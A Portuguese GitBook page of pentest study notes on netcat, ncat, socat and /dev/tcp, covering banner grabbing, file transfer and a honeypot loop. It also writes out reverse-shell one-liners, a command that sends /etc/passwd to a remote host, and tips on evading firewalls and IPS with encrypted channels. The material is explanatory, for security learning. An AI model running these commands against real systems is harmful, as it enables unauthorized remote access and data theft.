🧙‍♂️
nico
  • Design Patterns
    • Factory Method
  • Javascript
    • Como rodar um código JS?
    • Comentários
    • Variáveis
    • Tipos
    • Conversão de tipos
    • Literais
    • Estruturas de Repetição
    • Declaração Condicional
    • Tratamento de Erros
    • Operadores
    • Functions
    • Classes
    • Classes Importantes
    • Programação Assíncrona
    • Módulos
  • Git
    • Básico
    • Branches
    • Listando repositórios remotos e arquivos de configuração
    • Commits
    • Stash
    • Logs
    • Tags
    • Reset e Revert
    • Checkout, Rm e clean
    • Merge
    • Fetch e Pull
    • Show
  • Segurança da Informação
    • Swiss Army Knife
      • Utilitários
    • Information Gathering - Business
      • Métodos de coleta de informações
    • Information Gathering - Business
    • Information Gathering - INFRA
      • Métodos de coletas de informações
    • Information Gathering - Web
      • Métodos de coleta de informações
    • Scanning
      • Tracking the route
      • Firewall
      • Ping Sweep
      • Identificado hosts ativos em uma rede interna utilizando o ARP
      • Nmap: the network mapper
      • Network Sweeping
    • Burlando mecanismos de defesa
      • Bypass Firewall
      • IDS - Intrusion Detection System
      • IPS - Intrusion Prevention System / Bloqueio de Port Scanning
      • Bypass IDS/IPS/FW
    • Enumeration
      • Enumerando HTTP
      • Enumerando HTTPS
      • Identificando WAF - Web Application Firewall
      • Enumerando FTP
      • Enumerando NetBIOS / SMB
      • Enumerando com RPC
      • Automatizando a enumeração NetBIOS/SMB
      • Enumerando POP3
      • Enumerando SMTP
      • Enumerando SSH
      • Enumerando NFS
      • Enumerando SNMP
      • Enumerando MySQL
    • Hashes e Senhas - Linux
      • Entendendo os Hashes
      • Senhas em sistemas Linux
    • Hashes e Senhas - Windows
      • Introdução
      • Obtendo hashes em sistemas modernos
      • Obtendo hashes em servidores AD
      • Descobrindo hashes
      • Obtendo hashes e senhas em cache
      • Validando as credenciais obtidas
      • Obtendo hashes remotamente
      • Obtendo shell no host
      • Pass the Hash
      • Swiss Army Knife
      • Ataque: NBT-NS / LLMNR
    • Pentest Interno
      • Introdução
      • Identificando o escopo na rede.
      • Capturando hashes
      • Validando as credenciais
      • Enumerando as contas do AD
      • Conseguindo domain admin
    • Brute force: Ataques em senhas
      • Wordlists
    • Pentest Web
      • Identificando métodos aceitos
      • Open redirect
      • SQL Injection
      • Full Path Disclosure | Path Traversal or Directory Traversal
      • LFI - Local File Inclusion
      • HTML Injection
      • XSS - Cross Site Scripting
      • Command Injection
      • Bypass upload
    • Buffer Overflow
      • Arquitetura de computadores
      • Introdução
    • Pós exploração
      • Diferença de shells
      • Transferência de arquivos
      • Tunelamento
      • Enumeração Host: Windows
      • Privilégios e Mecanismos de Integridade
      • Bypass UAC
      • Enumeração Host: Linux
  • Docker
    • O que é docker?
    • Criação e edição de containers
    • Criação de imagens
    • Docker compose
  • Backend
    • Gerenciamento de memória
    • Concorrência e paralelismo
  • Data Structures & Alhorithms
    • Binary Search
Powered by GitBook
On this page
  • Netcat
  • Transferência de arquivos
  • Honeypot
  • Reverse shell
  • Ncat
  • Socat
  • /dev/tcp

Was this helpful?

  1. Segurança da Informação
  2. Swiss Army Knife

Utilitários

Netcat

Para utilizarmos o netcat, é bem simples, basta informar o ip e logo em seguida a porta. Com isso, é estabelecido a conexão com o serviço e no exemplo abaixo irá trazer o banner do FTP.

user@xubuntu:~$ nc -v www.businesscorp.com.br 21
Connection to www.businesscorp.com.br 21 port [tcp/ftp] succeeded!
220 ProFTPD 1.3.4a Server (FTP) [::ffff:37.59.174.225]

Se quisermos nos conectar em um serviço web, precisamos enviar uma requisição (GET, HEAD, POST, etc), junto com o local que queremos acessar (o exemplo abaixo foi utilizado o "/") e também a versão do http. Lembrando que se for HTTPS, será preciso enviar o cabeçalho host.

user@xubuntu:~$ nc -v www.businesscorp.com.br 80
HEAD / HTTP/1.0

Connection to www.businesscorp.com.br 80 port [tcp/http] succeeded!
HTTP/1.1 200 OK
Date: Sun, 29 Sep 2019 22:42:31 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 25 Sep 2019 17:05:45 GMT
ETag: "20463-1bb6-59363a9ea0957"
Accept-Ranges: bytes
Content-Length: 7094
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

Para abrirmos uma porta na máquina para outro host se conectar, utilizamos o netcat da seguinte forma. Nesse caso, basta o outro host utilizar o ip da máquina e a porta para estabelecer a conexão.

user@xubuntu:~$ nc -nlvp 4444
Listening on 0.0.0.0 4444

Transferência de arquivos

Se quisermos transferir arquivos, basta utilizar da seguinte forma.

nc -v <ip> <porta> < arquivo.txt

Agora do lado que irá receber o arquivo.

nc -nlvp <porta> > arquivo.txt

Honeypot

Se quisermos simular uma porta aberta em uma máquina para servir de honeypot, fazemos da seguinte forma. 

while true; do sudo nc -nlvp 21 1>> log.txt 2>> erro.txt; done;

Reverse shell

O netcat também é utilizado quando queremos obter uma reverse shell. Podemos abrir uma porta na nossa máquina e na máquina alvo enviar a conexão da seguinte forma.

nc <ip> <porta> -e /bin/bash

A ideia da reverse shell é burlar o firewall, uma vez que descoberto uma porta de saída na rede alvo, podemos ganhar vantagem disso fazendo a máquina alvo se conectar na nossa, enviando assim uma shell. Podemos gerar também através desse site.

Ncat

O ncat é uma evolução do netcat, a diferença é que ele suporta criptografia e então não é possível ler claramente o que for trafegado durante a comunicação. Precisamos então gerar um certificado e uma chave.

openssl req -x509 -newkey rsa:2048 -keyout chave.pem -out cert.pem -days 10

Para abrirmos a conexão, será solicitado que utilizamos a senha que foi inserido

ncat -nlvp <porta> --ssl-key chave.pem --ssl-cert cert.pem

Para conectar, precisamos passar um parâmetro a mais.

ncat -vn <ip> <porta> --ssl

Com uma comunicação criptografada, o firewall, ips ou similar, pode ter mais dificuldade de analisar os pacotes que estão sendo trafegados para um possível bloqueio.

Socat

No socat, podemos abrir uma determinada porta assim (por padrão ele pede dois endereços, então o "tracinho" serve como um alias para dizer que não possui outro endereço).

socat tcp4-listen:<porta> -

Para nos conectarmos, podemos utilizar qualquer utilitário e informar o ip e a porta que foi aberta.

Agora, utilizando o socat para conectar, fica da seguinte forma.

socat tcp4:<ip>:<porta> -

Se quisermos enviar o bin/bash.

socat tcp4-listen:<porta> EXEC:/bin/bash

/dev/tcp

O /dev/tcp também possui algumas funcionalidades caso não tenhamos acesso aos outros utilitários. Quando utilizamos ele, abrimos um socket tcp com determinado endereço de ip e porta. Podemos enviar uma mensagem, ou arquivo.

cat /etc/passwd > /dev/tcp/<ip>/<porta>

Se quisermos enviar um bash, fazemos da seguinte forma (o parâmetro -i significa interativo). 

bash -i > /dev/tcp/<ip>/<porta> 0>&1 2>&1

Lembrando que 0>&1 significa que todo stdin será direcionado para o stdout e 2>&1 signfica que todos os erros serão direcionados para o stdout.

PreviousSwiss Army KnifeNextInformation Gathering - Business

Last updated 2 years ago

Was this helpful?

LogoPayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub
LogoOnline - Reverse Shell Generator